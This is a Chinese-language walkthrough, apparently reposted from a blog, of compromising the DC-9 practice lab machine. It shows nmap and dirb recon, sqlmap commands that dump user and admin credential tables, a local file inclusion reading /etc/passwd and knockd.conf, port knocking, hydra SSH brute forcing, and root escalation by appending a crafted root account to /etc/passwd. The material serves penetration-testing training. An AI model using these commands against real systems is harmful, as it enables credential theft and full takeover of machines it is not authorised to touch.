渗透测试:DC-9靶机

业界资讯 2023-08-06 20:18:38 阅读次数: 0

一、扫描获取靶机ip

arp-scan -l

在这里插入图片描述

192.168.203.148

二、获取网站信息

1.nmap

nmap -sV -A 192.168.203.148

在这里插入图片描述

开放了22、80端口

2.Wappaloyzer

访问主页
在这里插入图片描述
Web服务器:Apache 2.4.38

3.dirb

dirb http://192.168.203.148

在这里插入图片描述

没有什么可以利用的

三、分析网站

Display 这里向我们显示了所有的用户信息

在这里插入图片描述

Search这里可以通过输入姓或名,可以查询相应信息

在这里插入图片描述
在这里插入图片描述

Manage这里登录用户密码,开始怀疑这里sql注入,但是检测没有,最后发现Search存在sql注入

在这里插入图片描述

4.Burp suit

抓取后发现是post传参

在这里插入图片描述

5.Sqlmap

将数据包保存至1.txt中进行爆破

爆库

sqlmap -r /root/1.txt -p search --dbs

在这里插入图片描述

爆表

sqlmap -r /root/1.txt -p search -D users --tables

在这里插入图片描述

爆列

sqlmap -r /root/1.txt -p search -D users -T UserDetails --columns

在这里插入图片描述

爆字段

sqlmap -r /root/1.txt -p search -D users -T UserDetails -C firstname,lastname,username,password --dump

在这里插入图片描述

+-----------+------------+-----------+---------------+| firstname | lastname   | username  | password      |+-----------+------------+-----------+---------------+| Mary      | Moe        | marym     | 3kfs86sfd     || Julie     | Dooley     | julied    | 468sfdfsd2    || Fred      | Flintstone | fredf     | 4sfd87sfd1    || Barney    | Rubble     | barneyr   | RocksOff      || Tom       | Cat        | tomc      | TC&TheBoyz    || Jerry     | Mouse      | jerrym    | B8m#48sd      || Wilma     | Flintstone | wilmaf    | Pebbles       || Betty     | Rubble     | bettyr    | BamBam01      || Chandler  | Bing       | chandlerb | UrAG0D!       || Joey      | Tribbiani  | joeyt     | Passw0rd      || Rachel    | Green      | rachelg   | yN72#dsd      || Ross      | Geller     | rossg     | ILoveRachel   || Monica    | Geller     | monicag   | 3248dsds7s    || Phoebe    | Buffay     | phoebeb   | smellycats    || Scooter   | McScoots   | scoots    | YR3BVxxxw87   || Donald    | Trump      | janitor   | Ilovepeepee   || Scott     | Morrison   | janitor2  | Hawaii-Five-0 |+-----------+------------+-----------+---------------+

但是这些账号登录不了,又尝试使用ssh,但是ssh也被过滤了,跑另一个数据库(Staff)

sqlmap -r /root/1.txt -p search -D Staff --tablessqlmap -r /root/1.txt -p search -D Staff -T Users --columnssqlmap -r /root/1.txt -p search -D Staff -T Users --dump

在这里插入图片描述

+--------+--------------------------------------------------+----------+| UserID | Password                                         | Username |+--------+--------------------------------------------------+----------+| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |+--------+--------------------------------------------------+----------+admin     transorbital1

登陆成功

在这里插入图片描述

可以看到页面下面出现File does not exist的提示,感觉很有可能就是LFI(本地文件包含)

wfuzz ‐p 127.0.0.1:8080:HTTP             #‐p:添加代理

字典地址:https://github.com/danielmiessler/SecLists

我们使用里面的burp‐parameter‐names.txt字典

使用burp尝试爆破

http://192.168.203.148/manage.php?a=../../../../etc/passwd

在这里插入图片描述
在这里插入图片描述

得知变量名为file

通过…/…/…/…/…/…/proc/sched_debug来查看Linux系统中任务的调度情况

http://192.168.203.148/manage.php?file=../../../../../../proc/sched_debug

在这里插入图片描述

四、连接

发现系统使用了knockd 服务

读取下knocked的配置文件

http://192.168.203.148/manage.php?file=../../../../../etc/knockd.conf

在这里插入图片描述
方法一 使用nc:
我们需要依次敲击7469 8475 9842端口实现敲门操作

nc 192.168.203.148 7469
nc 192.168.203.148 8475
nc 192.168.203.148 9842

在这里插入图片描述
方法二 使用nmap:

nmap -p 7469 192.168.203.148
nmap -p 8475 192.168.203.148
nmap -p 9842 192.168.203.148

在这里插入图片描述

使用hydra看一下哪些用户可以登上ssh,将用户名密码分别保存为user.txt和pass.txt文件中:
PS:字典里不要有空格

在这里插入图片描述

hydra -L user.txt -P pwd.txt 192.168.203.148 ssh

在这里插入图片描述

login: chandlerb   password: UrAG0D!   login: joeyt   password:Passw0rdlogin: janitor   password: Ilovepeepee

ssh连接

ssh [email protected]

在这里插入图片描述

使用爆破出来的用户登录,然后查看文件ls -la(可查看隐藏目录文件),在用户janitor中发现隐藏的secrets-for-putin目录,里面含有密码passwords-found-on-post-it-notes.txt

在这里插入图片描述

BamBam01Passw0rdsmellycatsP0Lic#10-4B4-Tru3-0014uGU5T-NiGHts

我们把这些密码加入到password文件中,再用hydra尝试爆破一次

hydra -L user.txt -P pwd.txt 192.168.203.148 ssh

在这里插入图片描述

爆破出一个新的用户

login: fredf   password: B4-Tru3-001

ssh连接

五、提权

ssh [email protected] -l

在这里插入图片描述

发现fredf可以NO Passwd执行root权限的文件

在这里插入图片描述

提示使用 python test.py 加参数运行

进入/opt/devstuff目录下,看到test.py文件

在这里插入图片描述

含义:3个参数,将第二个参数的文件内容增加在第三个参数文件里面,test目录可以root权限执行

思路:构造有root权限的账户放入到/etc/passwd中,利用构造的账户登录,就有了root权限了

使用openssl生成:

openssl passwd -1 -salt js 233333

在这里插入图片描述

$1$js$8LV1DbndSIfP29vG.eYaj1

写入到tmp目录下的ciyaso中

echo 'js:$1$js$8LV1DbndSIfP29vG.eYaj1:0:0::/root:/bin/bash' > /tmp/js

执行test:

cd /opt/devstuff/dist/testsudo ./test /tmp/js /etc/passwd

在这里插入图片描述
登录成功,读取flag

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_46706771/article/details/119880428
今日推荐
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
报告:Django 仍然是 74% 开发者的首选
《2024 年一季度互联网投融资运行情况》研究报告
15 年前上了“FFmpeg 耻辱柱”,今天他还得谢谢咱——腾讯QQPlayer一雪前耻?
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
周排行
计算机组成与设计(七)—— 除法器
Integer Approximation(分治+枚举)
大话数据库索引
windows10系统JDK的配置及下载地址
mysql实现秒值转换中原六仔平台搭建
Codeforces Round #556 (Div. 1)
百练1064 网线主管
Codeforces 995F Cowmpany Cowmpensation
子集生成之增量构造法,位向量法,二进制法
ERROR: cmd.exe failed with args /c "/APK\gradle\rungradle.bat...
每日归档
更多
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022